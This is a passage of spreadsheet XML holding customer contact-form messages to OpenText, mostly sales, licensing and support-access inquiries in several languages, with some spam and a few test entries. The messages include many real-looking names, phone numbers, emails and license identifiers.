Jag vill gärna  komma i kontakt med er för att få lite mer information om era olika lösningar och om det är något som skulle kunna vara intressant för min organisation. Ni får gärna ringa mig på telefonnr 0703435455 eller maila emma.olander@cancerfonden.se_x000D_
_x000D_
Mvh, _x000D_
Emma Olander </t>
  </si>
  <si>
    <t>haven't received information regarding class after paying...and your learning services folks are non responsive and my class is suppose to start Monday 12/3/2018</t>
  </si>
  <si>
    <t xml:space="preserve">We need your support to migrate/update  Streamserve V4.1.2 to Opentext Streaserve V16._x000D_
I'm waiting for your phone call._x000D_
Regards._x000D_
Nous avons besoin de votre accompagnement dans le projet de migration de Streamserve V4.1.2 vers la version 16 que propose aujourd'hui OPENTEXT. Cet accoimpagnement a pour but d'encadrer tout ce qui est prérequis et contraintes fortes pour ce projet._x000D_
J'espère pouvoir échanger avec vous par téléphone._x000D_
</t>
  </si>
  <si>
    <t>One of my clients uses Documentum and would like to automatically extract documents, I would like to know if there are any APIs to access your software. Best regards.</t>
  </si>
  <si>
    <t>We need help to use Archive Server API by means of REST from a cloud plateform in our environment  : (Archive server 10.5.0).</t>
  </si>
  <si>
    <t>i would like to send an invitation for a short interview with your cloud solution consultant. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I have some questions regarding OpenText Exstream for Salesforce._x000D_
_x000D_
Currently I'm looking for a solution that allows the generation of PDF documents from within Salesforce._x000D_
For my customer, two very important things have to be considered:_x000D_
1) A special font (licensed by the customer) needs to be used when generating the PDF documents, because it's an essential part of the customer's CI._x000D_
2) The solution needs to be 100% native to Salesforce, so the data is not to be transferred to any external server(s), not even temporarily._x000D_
_x000D_
Regarding point 1: I understand that when it comes to generating PDF documents directly in Salesforce any solution is bound to the fonts and font families that are supported by Salesforce out-of-the-box. However, since Exstream is capable of creating Microsoft Word documents, and opening them directly in Word (where the document can then be formatted using the custom font), this would be a viable solution for my customer._x000D_
_x000D_
So, here are my questions:_x000D_
- Does the customer have to install a certain plugin or add-in to Microsoft Word in order to be able to use this functionality?_x000D_
- Can you guarantee that using Exstream no processing is done on any third-party server, considering the workflow described above (Salesforce -&gt; Word -&gt; Save as PDF) but all processing is done in either Salesforce or the local PC of the user?_x000D_
_x000D_
I'd appreciate it, if you could answer these questions soon, since I only have a limited time for the evaluation process._x000D_
If you have any questions or need to know more about the requirements, feel free to contact me on my mobile._x000D_
Thanks, and best regards,_x000D_
Tobias_x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
PwC accompagne un des principaux aéroports français dans la dématérialisation de ses processus de facturation._x000D_
Dans ce cadre, nous étudions actuellement les différents éditeurs pouvant avoir une certaine verticalité/expérience sur ce secteur d'activité._x000D_
Un RFP sera lancé en début d'année 2019._x000D_
_x000D_
Avez-vous déjà expérimenté vos solutions dans ce secteur?_x000D_
_x000D_
Dans l'attente de votre retour,_x000D_
Cordialement,_x000D_
Alexis.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
in Zukunft werden wir mit der Firma BMW Rechnungen nur noch elektronisch austauschen._x000D_
Dazu suchen wir aktuell nach der besten Lösung für unsere Firma._x000D_
_x000D_
Wir haben noch kein entsprechendes System im Haus und würden uns gerne von Ihnen eine entsprechende Lösung anbieten lassen._x000D_
_x000D_
Folgende Optionen bietet uns BMW als EDI Verbindung an:_x000D_
_x000D_
Austausch von EDI Daten über das OpenText Value-Added-Network(OpenTexts VAN-Netzverbindung):_x000D_
VAN Verbindungsmethode: VDA_x000D_
VAN Nachrichtenformat: VDA_x000D_
Verbindung für Zahlungsavise: VAN und VDA_x000D_
Hier wird zusätzlich der VAN Provider, EDI Rechnungsdetails, AS2 Konnektivität und die OFTPv2 Kommunikationsmethode angefragt._x000D_
_x000D_
_x000D_
Austausch von EDI Daten über eine andere Format und Kanaloption(OpenTexts Direktverbindung):_x000D_
Direktverbindungsmethode:_x000D_
AS2_x000D_
OFTP2_x000D_
Direktverbindung Nachrichtenformat:_x000D_
VDA_x000D_
ZUGFeRD_x000D_
Hier wird zusätzlich noch folgendes angefragt:_x000D_
A1 Prozesscodes_x000D_
AS2 Konnektivität_x000D_
OFTPv2 Kommunikationsmethode_x000D_
_x000D_
Vielen Dank für Ihre Rückmeldung._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Marc Thomas</t>
  </si>
  <si>
    <t>open dwg files</t>
  </si>
  <si>
    <t>Last week also I filled this form to contact you. Unfortunately, I no one contacted me. Could you please contact me ASAP. I just want to purchase Tempobox</t>
  </si>
  <si>
    <t>AAA最主要AAA</t>
  </si>
  <si>
    <t>Перезвоните мне пожалуйста 8(499) 322-46-85, Дмитрий.</t>
  </si>
  <si>
    <t>My name is Julie and I am the Practice Lead for ECM at GWI Consulting in Brisbane Australia. We are a technology agnostic, information and data management firm. I was wondering if I could speak to someone about arranging an OpenText demo in the near future.</t>
  </si>
  <si>
    <t>My name is Julie and I am the Practice Lead for ECM at GWI Consulting in Brisbane Australia. We are a technology agnostic, information and data management firm. I was wondering if I could speak to someone about arranging an M-Files demo in the near future.</t>
  </si>
  <si>
    <t>We would like to inquire of your HR office at Shanghai China to get an employment verification checking at Actuate Software(Shanghai). Please provide phone number or email address on how we can confirm an employment details of one of your previous worker. thank you.</t>
  </si>
  <si>
    <t>I use to have a fax number 866-777-5846 with you fax2mail and would like to reactivate my account with the same number if possible.</t>
  </si>
  <si>
    <t>I urgently need some help modelling pricing with an existing client. Colleen H was our last contact</t>
  </si>
  <si>
    <t>Looking at different faxing solutions</t>
  </si>
  <si>
    <t>I registered to get access to Documentum technical documentation and support. However, I keep getting the message that I do not have access. Could someone kindly look into this and help me since I am at a client site helping on a Documentum implementation effort.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I wanted to reach out and check whether you have need of database of Security Professionals which includes complete contact details of:_x000D_
_x000D_
CEO, CIO, CTO, CSO, CFO, Business Development, Country Manager, Regional Manager, Head of Operation, Head of Architecture, IT Director, HR Director, Head of Logistics, Head of Sales &amp; Marketing, Chief development officers, Presidents, Directors and many more._x000D_
_x000D_
Sectors: Finance, Government, Oil &amp; Gas, Military, Legal, Banking &amp; Finance, Education, Aviation, IT, E-commerce, Operational Technology, Public sector, Insurance, Utilities, Auto Trader Group, Secondary Navigation, Business Services, Financial Services, Healthcare &amp; Life Sciences, Hotel &amp; Travel, Manufacturing &amp; Automotive, Media &amp; Entertainment, Online Gaming, Public Sector, Retail &amp; Consumer Goods, Mobile Technology, Software &amp; Technology, Water and Wastewater Systems Sector, Nuclear Reactors, Materials, Waste Sector, Defense Industries and many more._x000D_
_x000D_
Kindly share your target criteria. I will get back to you with few free samples and more details._x000D_
_x000D_
Target Industry:_x000D_
Target Job titles:_x000D_
Target Geography:_x000D_
_x000D_
_x000D_
Also, my apologies, if you are not the right person to reach out to. Could you direct me to the right person to talk about this in detail?_x000D_
_x000D_
Thanks and Regards,_x000D_
Rocky Weiss</t>
  </si>
  <si>
    <t>AAA填充物AAA</t>
  </si>
  <si>
    <t xml:space="preserve">We need to update our Catalogue ID to 10424054. Please contact Robert Garcia at OpenText ASAP. Thank you. </t>
  </si>
  <si>
    <t>Hello, I'm interested in taking a look at and receiving a demo of your case management solution, in particular the OpenText Cordys one to help us better manage our cases. Thank you!</t>
  </si>
  <si>
    <t>We are currently updating an old computer system, and one of the installers that is part of our system is Open Text NFS Server 14.  Unfortunately the installer is 32 bit.  Is the purchase of your software for either 32 or 64, or is it for both installers?  I am trying to figure out if I need to find who was the original person to create this install disk to find a different installer, what we need to do for this upgrade.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking to migrate to Sharepoint Online and want to know of eDOCs has any existing integration with this product. Please let me know if this is possible or not._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Nathan</t>
  </si>
  <si>
    <t>Careers:_x000D_
I have attempted to reset my password for the email address: ryantmurdoch@gmail.com.  I have not received am email about resetting my password and I have checked Junkmail as well.  Please assist with this._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Ryan</t>
  </si>
  <si>
    <t>We are currently using M-Files and I want to look at alternatives for our EIM system.</t>
  </si>
  <si>
    <t>Not receiving confirmation email.  Need to be able to access support portal.</t>
  </si>
  <si>
    <t>I would like to understand cost/deployment options related to Documentum as a Service.  Looking for a near term purhcase</t>
  </si>
  <si>
    <t xml:space="preserve">I was registered for Fax2Mail. I received an email that said that I'm registered, but I'm not getting the faxes. How do I get the faxes to come to my email? Am I supposed to download something? _x000D_
Thanks,_x000D_
Amber </t>
  </si>
  <si>
    <t>I manage the licenses for OpenText SOCKS Client for IBM internal use.  Some people have asked how to get the 14.0.16 or version 16 fix pack.  But when I login I only find Service Pack 14 on My Support and the patches download site.  How do I get FP 16?   Thank you!</t>
  </si>
  <si>
    <t>seeking information on cloud solutions accredited through fedramp</t>
  </si>
  <si>
    <t xml:space="preserve">We are updating our database record including any applicable ECCN's for each software application we have in our environment. Please provide  ECCN for  following Applications:_x000D_
1. OpenText Livelink Unlimited Servers Unlimited Usage_x000D_
2. OpenText Object Importer Unlimited Usage_x000D_
3. OpenText Fax Server Enterprise Suite_x000D_
4. OpenText Livelink PDF Forms Unlimited Usage_x000D_
5. OpenText Adlib Express Server + EFTS Non-Production Unlimited Usage_x000D_
6. OpenText Activator for SAP Solutions_x000D_
7. OpenText DocuLink for SAP Solutions Standard Named Users_x000D_
8. OpenText Application Governance &amp; Archiving for Microsoft SharePoint (Add on Bundle)_x000D_
9. OpenText Service Programs Monitoring Unlimited Usage_x000D_
10. OpenText ECM Everywhere ActiveView_x000D_
11. OpenText Brooktrout SR140 8 Chan_x000D_
12. OpenText RF Additional DDC_x000D_
13. OpenText Content Server SDK (version 9.7.1 and earlier)_x000D_
14. OpenText Livelink Archive (tm) for SAP (tm) R/3 (r)_x000D_
15. OpenText WebReports_x000D_
16. OpenText Appearance XML Unlimited Usage_x000D_
17. OpenText Enterprise Library Web Parts for Microsoft SharePoint_x000D_
18. OpenText SAW - ImageLinks_x000D_
19. OpenText Extended Collaboration Full Named Users_x000D_
20. OpenText Content Viewer Toolkit View Client Licenses Unlimited Usage_x000D_
21. OpenText Discovery Server Java Toolkit Unlimited Usage_x000D_
22. OpenText Performance Analyzer Unlimited Usage_x000D_
23. OpenText AdLib eXpress Server Professional Edition Unlimited Usage_x000D_
24. OpenText LiveLink Enterprise Suite_x000D_
25. OpenText Secure Shell_x000D_
26. OpenText Content Suite Platform Standard Named Users_x000D_
27. OpenText PDF Publishing Unlimited Usage_x000D_
28. OpenText Archiving for SAP Solutions Standard Named Users_x000D_
29. OpenText BRS/Search for NT w/NetAnswer V2.0 Unlimited Usage_x000D_
30. OpenText Livelink ECM - Activator for SAP Solutions Dev License_x000D_
ECCNs are five character alpha-numeric designations used on the Commerce Control List (CCL) to identify dual-use items for export control purposes._x000D_
Please email via email._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I need part time job at this holidays</t>
  </si>
  <si>
    <t>Currently using FirstClass on our own hardware with 3rd party vendor support. I'm interested in moving to FirstClass on a hosted platform.</t>
  </si>
  <si>
    <t>NEED TO SET UP NEW USER ID AND PASSWORD. FORMER EMPLOYEE DID NOT LEAVE ME THIS INFORMATION AND I NEED TO REPORT RITE AID AND TARGET INVOICES SO THAT I CAN RECEIVE PAYMENT</t>
  </si>
  <si>
    <t>Support Account not working</t>
  </si>
  <si>
    <t>We are customer # 10203593.  I am hoping to speak with an account representative please.</t>
  </si>
  <si>
    <t>Topco is having Open Text system now we are planning to upgrade it to latest-1, part of this upgrade we need user id with full access of software, docs, raise support ticket etc..</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
at Bosch Sicherheitssysteme GmbH in Grasbrunn, we have the following OpenText solutions as part of our SAP systems running:_x000D_
- StreamServe Design Center_x000D_
- StreamServe OpenText StoryTeller_x000D_
- StreamServe Control Center_x000D_
_x000D_
Starting from Jan. 2019, we plan to outsource all developments in our OpenText solutions and therefore are looking for a tailored solution._x000D_
_x000D_
I am looking forward to receive further information on your offers._x000D_
_x000D_
Best regards,_x000D_
Daniel Arens_x000D_
_x000D_
Building Technologies, Sales and Marketing and Quotation_x000D_
Bosch Sicherheitssysteme GmbH | Postfach 11 11 | 85626 Grasbrunn | GERMANY | Tel. +49 89 6290-2371 | Mobile +49 152 57929360 | _x000D_
_x000D_
Registered Office: Stuttgart, Registration Court: Amtsgericht Stuttgart HRB 23118_x000D_
Chairman of the Supervisory Board: Stefan Hartung; Managing Directors: Tanja Rückert, Andreas Bartz, Thomas Quante, Bernhard Schuster</t>
  </si>
  <si>
    <t>Integration question.  Can someone please get back to me?  This is the second request.</t>
  </si>
  <si>
    <t>What is the cancellation policy regarding Open Text Support contracts?  We cannot find same in our current contract.  Thank you.</t>
  </si>
  <si>
    <t>I am interested in OpenText. Can some one please call me @ 973-279-4411</t>
  </si>
  <si>
    <t>Need a renewal quote for Flight Safety International</t>
  </si>
  <si>
    <t>ay haga fe ay haga</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
Can you help me?_x000D_
We have a customer for whom we bought a license in October 2010._x000D_
Today when we evaluate this license, the expiry date is in 2020._x000D_
Can you provide me with a new key for this product to update the expiration date beyond 2020?_x000D_
You will find attached the initial delivery and below the product key._x000D_
$UNIFY/../unsup/prlcinf_x000D_
custid = 104694_x000D_
_x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t>Trying to reset my Fax2mail login information for the new portal</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I believe that you’re providing an following services like Advertising, Advisory services, Branding, Direct mailing, Data collection, Data analysis, Market Research, Marketing/sales, Publishing, Survey and other related services to various industries._x000D_
_x000D_
Would you be interested to purchasing an Opt-in email list for your lead generation, email campaign, tele-calling, product promotion activities?_x000D_
_x000D_
Please share your requirement, if you are interested in this._x000D_
_x000D_
Target industry: ________; Job titles: __________; Geography: __________:_x000D_
_x000D_
Thanks_x000D_
Adam Nealson_x000D_
V3 Data Intel Inc.,_x000D_
</t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону 8 (812) 984-74-51, Евгения.</t>
  </si>
  <si>
    <t xml:space="preserve">The machine that I had install my encase crushed and would like to reactivate;_x000D_
Order Number:	666674_x000D_
 _x000D_
	_x000D_
 _x000D_
License Key (serial #):	G2002060945, X100008035062_x000D_
let me know if its possible  </t>
  </si>
  <si>
    <t>I'm not able to download encase forensic product. This is regarding the license we recently bought.</t>
  </si>
  <si>
    <t>We are looking for pricing of a single instance of Documentum 7.2. This is for a test/dev environment. Can you please provide the licensing costs?</t>
  </si>
  <si>
    <t>I'm not able to access license section</t>
  </si>
  <si>
    <t>Do you have any products that will work with BMC Remedy 9.1.   We are in a DoD contract and are unable to use the Open Source BIRT tool to modify the out of the box Remedy reports._x000D_
v/r_x000D_
Dan</t>
  </si>
  <si>
    <t>I would like to get your tempobox for file sharing.</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please furnish a letter listing your Open Text partners in S.A_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>i confirmed my email id still i am not able to get "My Support" credentials</t>
  </si>
  <si>
    <t>Hi, I'm individual and would like to have access to support ( mainly for knowledge articles, known issues)  for learning purpose._x000D_
_x000D_
Can you please let me know if you can grant me access to this section._x000D_
_x000D_
Regards,_x000D_
Hari</t>
  </si>
  <si>
    <t xml:space="preserve">Wish to sell and support and OpenText in East Africa </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Please can you pass this to your Analyst Relations department. I am about to publish a research report including a user-evaluation of OpenText products. Thanks. </t>
  </si>
  <si>
    <t>Interested</t>
  </si>
  <si>
    <t>OpenText extended ECM for SAP solutions	N/A	2100_x000D_
OpenText Brava View and Annotate	N/A	300_x000D_
OpenText Web Reports	N/A	1500_x000D_
OpenText Automatic Document Numbering (ADN)	N/A	100_x000D_
OpenText Transmittal Management	N/A	100_x000D_
OpenText Capture Center (450K pages per year)	N/A	1</t>
  </si>
  <si>
    <t>wir haben ein Lastenheft für die Erstellung eines Angebots für ein DMS erstellt und benötigen einen Kontakt, dem wir das zuleiten können</t>
  </si>
  <si>
    <t xml:space="preserve">I am working for client where I am trying to implement OpenText Business Center for S/4HANA on premise. I am trying to download installation guide for the same at support(dot)opentext(dot)com; However, every time it says me that you are not register. Kindly provide me the installation and configuration guide so that I can implement it. </t>
  </si>
  <si>
    <t xml:space="preserve">Currently we are on Encase Endpoint Investigator 8.06. Can we upgrade to 8.07?_x000D_
_x000D_
Our dongle ID is G3002094584 and we are still on SMS _x000D_
_x000D_
Regards, _x000D_
Andri </t>
  </si>
  <si>
    <t>Sales enquiry and demo for OpenText BPM platform procurement at India. Kindly connect at Bangalore Office if possible.</t>
  </si>
  <si>
    <t>I have a South Korean client for whom I am acting Director of Quality Assurance and Compliance.  Also, I am currently participating in / directing IT / software sourcing ( I am a PhD biochemist with a parallel background as a netadmin, dbadmin, and LIMS administrator, and perform a great deal of computerized systems validation and vendor qualification in the IT / software vendor space).  We are looking for a collaboration tool, and I am very familiar with LiveLink / OpenText as a document management / repository tool from a previous assignment where I was also acting Director of Quality (sorry, not allowed to name the previous client).  Based on this previous client's very successful experience with your product, I am recommending your solution to the South Korean client.  Please contact me at your earliest convenience.  I will work with you to get a proposal on a solution, including the price points and structuring, at which point I will then present it to the client, and after their concurrence then proceed to arrange for a CDA and navigate the relationship from there.  At this point, please submit your proposal directly to my company, Bio/Logic Consultants, Inc., until the client agrees to be named and enter into a relationship with you.  I am a big fan of how this worked in my previous life, and so I am looking forward to iterating toward a solution for my client.  You can email me or call me directly.  I am in South Korea right now, with a 17-hour time difference (17 hours ahead) from the West Coast.  However, you may call me during your regular business hours; I will be available.  Looking forward to speaking with you._x000D_
_x000D_
Regards,_x000D_
_x000D_
Bill White</t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону 8 (499) 322-46-85, не обращайте внимания на слова робота,зависла АТС, дожитесь ответа, Евгения.</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry on platform. </t>
  </si>
  <si>
    <t>Why can't I have access to my support? I have a message "no access" and  "request confirmation email" but I have sent my confirmation 5 times..._x000D_
please help!!</t>
  </si>
  <si>
    <t>I am interested in a couple of online classes and have money in the budget now but would like to complete the classes in 2019.  Can we purchase the classes now and start them when we have time in 2019?  Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Right fax is load on my computer, however I can not access folders. </t>
  </si>
  <si>
    <t>Hello,_x000D_
My name is Jamie. I’m doing promotions for my website related to cybersecurity and would like to post our high quality guest post related to the worst cybersecurity breaches of 2018 on your website or have a sponsored post written by your author. We've recently done some research that revealed some interesting facts and I would like to share it with your audience. _x000D_
_x000D_
Could you tell me please if it's possible? If yes, what are your requirements?_x000D_
_x000D_
I look forward to hearing from you!_x000D_
_x000D_
All the Best,_x000D_
Jamie Cambell_x000D_
@jamiecambellcso</t>
  </si>
  <si>
    <t>To Whom It May Concern:_x000D_
 _x000D_
My name is Claymore MacTarnaghan. I’m a military veteran and work with a broad talent pool of veteran/military spouses in the professional business community currently seeking employment. I’ve been asked to reach out and see if you were interested in hiring more veterans/military spouses. _x000D_
 _x000D_
I wanted to set up an appointment for a 15-minute conference call with one of my colleagues. Please send over a good contact number and few dates/times that work best for you between 8:30am to 3:30pm. I’ll send over a calendar invite and look forward to speaking with you!_x000D_
 _x000D_
Best,_x000D_
 _x000D_
Claymore MacTarnaghan_x000D_
Account Manager_x000D_
(206) 686-2898 ext. 108</t>
  </si>
  <si>
    <t>We recently acquired a company, BMS Practice Solutions, that uses Documentum/ApplicationXtender for scanning and document processing. I'd like to discuss our licenses and potential engagement with a service vendor to assist us.</t>
  </si>
  <si>
    <t xml:space="preserve">I am Ron Fredona, I work Tech Support in Tucson, my Supervisor is Tracy Barlow._x000D_
last Wednesday, my wife was hospitalized for a heart attack. because she was in such distress, they operated Thursday morning, (thanksgiving) to do a quadruple bypass and repair two heart valves. (This is the 3rd major operation she has undergone in 5 months. first two for her back and now her heart). As soon as she was put under anesthesia, she coded. the surgical team was able to resolve emergency and complete the bypass, but could not continue with the heart valve replacements, for fear of losing her. when they tried to close the chest, it was exerting too much pressure on her heart, and they have been forced to leave her on life support, heart pump and ventilator, with her chest still open  for 4 days. they will close her tonight as she is stable and doing well enough to attempt it._x000D_
My Problem is at this point I believe I have expending all my vacation and sick time allotted to me. I am out today, to attend her and be ready when they do the Surgery. she will be in ICU again afterwards, and I need to be with her tomorrow and perhaps a few day further._x000D_
the loss of her income over the last 5 months has bee very stressful, but I fear for my job being out so much. please advise me and tell me what we need to do. She and I are both 65 yrs old. _x000D_
I have already discussed this with Tracy Barlow, my Boss at FDDG/Tucson. please feel to talk with her if need be. contact me either by Email or Phone at 520-850-5565. thank you, Ron_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I want to know what the latest version of Open Text Biquery is and also if the latest version of OpenText Biquery can have more then one GUI language for multi language support.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I work for Montgomery County Department of Recreation, we are looking for a HIPPA compliant solution for sending and receiving faxes.  Can you recommend a solution and the typical costs associated with?_x000D_
_x000D_
Thank you, _x000D_
_x000D_
Dan Deteau_x000D_
Montgomery County Recreation_x000D_
IT Specialist</t>
  </si>
  <si>
    <t>Request demo of Documentum</t>
  </si>
  <si>
    <t>I would like to pay our invoice online with a credit card.  Reference Number RC387716, contract numberG-SC2005710</t>
  </si>
  <si>
    <t>I'd like to learn more about OMR software to scan in paper surveys and reduce manual data entry.</t>
  </si>
  <si>
    <t>Can you tell me who the account manager for Dairy Farmers of America would be?</t>
  </si>
  <si>
    <t>We urgently need to upgrade to Encase V8. Can someone please contact me on my cell phone. 617-599-2273.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We are updating our database record including any applicable ECCN's for each software application we have in our environment. Please provide  ECCN for  following Applications:_x000D_
1.	OpenText Livelink Unlimited Servers Unlimited Usage_x000D_
2.	OpenText Object Importer Unlimited Usage_x000D_
3.	OpenText Fax Server Enterprise Suite_x000D_
4.	OpenText Livelink PDF Forms Unlimited Usage_x000D_
5.	OpenText Adlib Express Server + EFTS Non-Production Unlimited Usage_x000D_
6.	OpenText Activator for SAP Solutions_x000D_
7.	OpenText DocuLink for SAP Solutions Standard Named Users_x000D_
8.	OpenText Application Governance &amp; Archiving for Microsoft SharePoint (Add on Bundle)_x000D_
9.	OpenText Service Programs Monitoring Unlimited Usage_x000D_
10.	OpenText ECM Everywhere ActiveView_x000D_
11.	OpenText Brooktrout SR140 8 Chan_x000D_
12.	OpenText RF Additional DDC_x000D_
13.	OpenText Content Server SDK (version 9.7.1 and earlier)_x000D_
14.	OpenText Livelink Archive (tm) for SAP (tm) R/3 (r)_x000D_
15.	OpenText WebReports_x000D_
16.	OpenText Appearance XML Unlimited Usage_x000D_
17.	OpenText Enterprise Library Web Parts for Microsoft SharePoint_x000D_
18.	OpenText SAW - ImageLinks_x000D_
19.	OpenText Extended Collaboration Full Named Users_x000D_
20.	OpenText Content Viewer Toolkit View Client Licenses Unlimited Usage_x000D_
21.	OpenText Discovery Server Java Toolkit Unlimited Usage_x000D_
22.	OpenText Performance Analyzer Unlimited Usage_x000D_
23.	OpenText AdLib eXpress Server Professional Edition Unlimited Usage_x000D_
24.	OpenText LiveLink Enterprise Suite_x000D_
25.	OpenText Secure Shell_x000D_
26.	OpenText Content Suite Platform Standard Named Users_x000D_
27.	OpenText PDF Publishing Unlimited Usage_x000D_
28.	OpenText Archiving for SAP Solutions Standard Named Users_x000D_
29.	OpenText BRS/Search for NT w/NetAnswer V2.0 Unlimited Usage_x000D_
30.	OpenText Livelink ECM - Activator for SAP Solutions Dev License_x000D_
_x000D_
ECCNs are five character alpha-numeric designations used on the Commerce Control List (CCL) to identify dual-use items for export control purposes._x000D_
Please email via email._x000D_
</t>
  </si>
  <si>
    <t>I would like a quote to purchase 2 licenses for Secure Shell to go with our existing exceed software. Please send quote to my email address. thanks.</t>
  </si>
  <si>
    <t>would like to pay my bill online for contract number 0012122066  (Ref # RC338220)</t>
  </si>
  <si>
    <t>I am wondering if our fax # is supplied by you, and if so we need the caller id changed from Phyllis Pearson to Pearson Bollman Law.  Our fax # is 866-836-7223._x000D_
_x000D_
Also, is there a way to contact you from the portal?  I couldn't find a way too, and had to google to get your customer support contact page..._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Melissa Meyer</t>
  </si>
  <si>
    <t>Eastman wishes to identify a list of companies (Supplier(s)) capable of providing document management for Engineering, Procurement, and Construction (EPC) Solutions projects (Solutions) at all our global sites. Eastman would like to initiate a formal Request for Information (RFI) inquiry to evaluate qualifications and interest to provide the Solutions requested. Please reply to brienlewis@eastman.com and more information will be made available for the inquiry pending interest. Thank you for your time._x000D_
_x000D_
Brien Lewis</t>
  </si>
  <si>
    <t xml:space="preserve"> I have created account recently and I am not able to access knowledge center.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to know more about your OCR product and its capabilities around OCR._x000D_
It would be nice if you could send me some technical details about your product, APIs and documentation around it._x000D_
_x000D_
Looking forward to hear from you._x000D_
_x000D_
Thanks,_x000D_
Shailesh</t>
  </si>
  <si>
    <t>Requesting for an update on the job reference applied Ref#: 21272</t>
  </si>
  <si>
    <t>Bonjour, proposez-vous une solution de GED avec prise en charge complète des circuits de demande d'achat + circuit de traitement des factures fournisseurs ? Et surtout votre solution peut elle être hebergée chez votre client (cad nous) ?_x000D_
Merci pour vos retours</t>
  </si>
  <si>
    <t>Bahasa</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are considering building a print by API solution. As a part of this, we need to be able to generate documents (PDF/PS + ZPL/CPCL) server side, from templates and data._x000D_
Your ExStream solution looks fit for this task._x000D_
_x000D_
I need some expert consultancy to be sure that this is what I need and that it will fit well in our IT environment._x000D_
_x000D_
Please contact me or recommend me some expert company (preferably in Moscow, Russia) for this task._x000D_
_x000D_
Thank you,_x000D_
Regards,_x000D_
Sergey Tishinevich</t>
  </si>
  <si>
    <t>Information PixTools  SDK_x000D_
Is version 8.6 a 64 bit version?_x000D_
Do you have any info brochure?_x000D_
Is there a test version available?</t>
  </si>
  <si>
    <t>Hi sjsf aksgzga sjxgshzuz sjsh</t>
  </si>
  <si>
    <t>We run BIRT for report generation and some of the data has recently been encrypted (at rest, in our database) with the following product:_x000D_
_x000D_
Microfocus - Voltage SecureData Enterprise (couldn't provide URL)_x000D_
_x000D_
At a very high level our applications send data via a REST API for encryption/decryption._x000D_
_x000D_
The data our BIRT server reads is encrypted in the database and currently does not have the ability to decrypt this data._x000D_
_x000D_
Could you possibly help me with the procurement of a BIRT plugin (or a resource capable of developing a plugin) to decrypt data via the same REST API before report generation?_x000D_
_x000D_
Obviously a lot more detail can be supplied, but at a very high level this is what we need…</t>
  </si>
  <si>
    <t>I would like your technical help for not being able to see the preview pane in Encase V7.10 at main tab.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je souhaite acquérir une licence Hummingbird v14 compatible avec un OS Windows Server 2016, pourriez-vous me faire une offre ?_x000D_
Cordialement_x000D_
Alain Groeneveld</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
Je suis actuellement en phase de découverte des solutions ECM exstantes et la votre, de par sa position dans le MQ de Gartner m'interesse tout particulierement. Pourrions nous programmer un entretien pour parler de votre solution et eventuellement avoir une démonstration ?_x000D_
_x000D_
Merci d'avance pour votre aide._x000D_
_x000D_
Bien à vous,_x000D_
Robin Ibrard</t>
  </si>
  <si>
    <t>We are considering moving paper-based employee files to a digital solution hosted by a third party. It is our understanding that OpenText is a Vendor of Record for EIM solutions under an agreement with the Province of Ontario and we would like to see what kind of hosted solution you may be able to provide under the VOR program.</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in learning more about opentext. Used teleforms a while back, and might have another use for this software. Need to understand how the data is processed to see if it will work for our organization. Email is the best way to contact me. </t>
  </si>
  <si>
    <t>We already cancelled our subscription but we still receive invoices. Can you please look into this? Thank you. Kind regards, Bieke Becue</t>
  </si>
  <si>
    <t>Interested in Opentext Axelerate on premise and cloud deployment for on demand eDiscovery projects.</t>
  </si>
  <si>
    <t>Hi,_x000D_
We already work with you, I would like to know which options do you offer for the new e-invoicing system in Italy. _x000D_
Thanks,</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, _x000D_
I downloaded encase v8.07. I cannot upload a new case. Probably it's a certificate problem because I do not have it. My dongle has serial number G2002080486 expiring on 2025/02/12._x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren_x000D_
_x000D_
Wir, die Legacy Pharmaceuticals Switzerland GmbH in Birsfelden, sind im Prozess der Einführung eines neuen ERP-Systems (SAP4/HANA). Bitte nennen Sie uns einen Ansprechpartner in der Schweiz für die Themen:_x000D_
_x000D_
-	Archivsystem (Hardware)_x000D_
-	Revisionssichere Archivierung_x000D_
-	Archivierung Drucklisten_x000D_
-	Archivierung ein-/ausgehende Dokumente (Rechnungsbelege)_x000D_
-	Datenarchivierung_x000D_
-	Workflow Kreditorenbuchhaltung_x000D_
_x000D_
Besten Dank für Ihr Feedback und freundliche Grüsse_x000D_
Michael Schnitzer_x000D_
IT_x000D_
Legacy Pharmaceuticals</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - _x000D_
_x000D_
I use Encase Forensic software which I received through the US Secret Service in 2016.  My SMS expired in July of this year.  Can I get a quote to renew my SMS?  My Donlge ID is G3002087132._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To go for EnCase certification </t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
We have a requirement and we need a quotation for the same. Below mentioned is the product name :_x000D_
